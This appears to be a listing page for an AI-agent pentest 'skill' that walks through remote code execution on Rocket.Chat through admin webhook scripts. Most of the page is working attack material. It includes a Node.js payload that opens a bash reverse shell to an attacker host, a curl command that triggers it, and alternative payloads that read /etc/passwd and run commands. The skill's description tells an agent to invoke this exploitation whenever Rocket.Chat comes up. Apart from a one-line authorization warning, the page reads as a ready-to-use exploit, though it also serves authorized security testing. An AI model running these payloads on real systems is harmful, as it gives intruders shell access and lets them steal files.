OpenSkillIndex← back to search

Hacktricks-skills rocket-chat-pentest

Use this skill when pentesting Rocket.Chat installations and you have admin access. This skill helps you exploit the webhook JavaScript execution feature to achieve Remote Code Execution (RCE). Trigger this skill when the user mentions Rocket.Chat, Rocket Chat, or wants to test Rocket.Chat security, especially if they have admin credentials or are doing authorized security assessments.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/pentesting-web/rocket-chat/SKILL.MD
source content

Rocket.Chat Pentesting - RCE via Webhooks

Overview

If you have admin access to a Rocket.Chat installation, you can achieve Remote Code Execution (RCE) by exploiting the webhook integration feature. Rocket.Chat uses ES2015/ECMAScript 6 (JavaScript) to process webhook data, which can be leveraged to execute arbitrary commands.

Prerequisites

  • Admin access to the Rocket.Chat instance
  • Network access to the Rocket.Chat admin panel
  • A listener/reverse shell handler on your attack machine

Exploitation Steps

1. Access the Integrations Panel

Navigate to the admin integrations page:

/admin/integrations/incoming

Click New Integration and choose either:

  • Incoming WebHook, or
  • Outgoing WebHook

Both webhook types support JavaScript execution.

2. Configure the Webhook

Set up the webhook with the following:

  • Channel: Must be an existing channel in Rocket.Chat
  • Post as username: Must be an existing user
  • Script: Insert the malicious JavaScript payload (see below)

3. JavaScript Reverse Shell Payload

Use this Node.js reverse shell payload in the webhook script field:

const require = console.log.constructor("return process.mainModule.require")()
const { exec } = require("child_process")
exec("bash -c 'bash -i >& /dev/tcp/YOUR_IP/YOUR_PORT 0>&1'")

Customize:

  • Replace 
    YOUR_IP
    with your attacker machine IP
  • Replace 
    YOUR_PORT
    with your listener port

4. Save and Trigger

  1. Save the webhook configuration

  2. Copy the generated webhook URL

  3. Trigger the webhook with curl:

    curl -X POST "<WEBHOOK_URL>"

  4. Your reverse shell should connect back to your listener

Alternative Payloads

Basic Command Execution

const { exec } = require("child_process")
exec("whoami")

File Read

const fs = require("fs")
const content = fs.readFileSync("/etc/passwd")
console.log(content.toString())

System Information

const os = require("os")
const { execSync } = require("child_process")
console.log("Hostname:", os.hostname())
console.log("Platform:", os.platform())
console.log("Node Version:", process.version)

Safety & Authorization

⚠️ IMPORTANT: Only use this technique on systems you have explicit authorization to test. Unauthorized access to computer systems is illegal.

Troubleshooting

  • No reverse shell received: Verify your listener is running and firewall allows connections
  • Webhook not executing: Ensure the channel and username exist in Rocket.Chat
  • Script errors: Check Rocket.Chat logs for JavaScript execution errors

References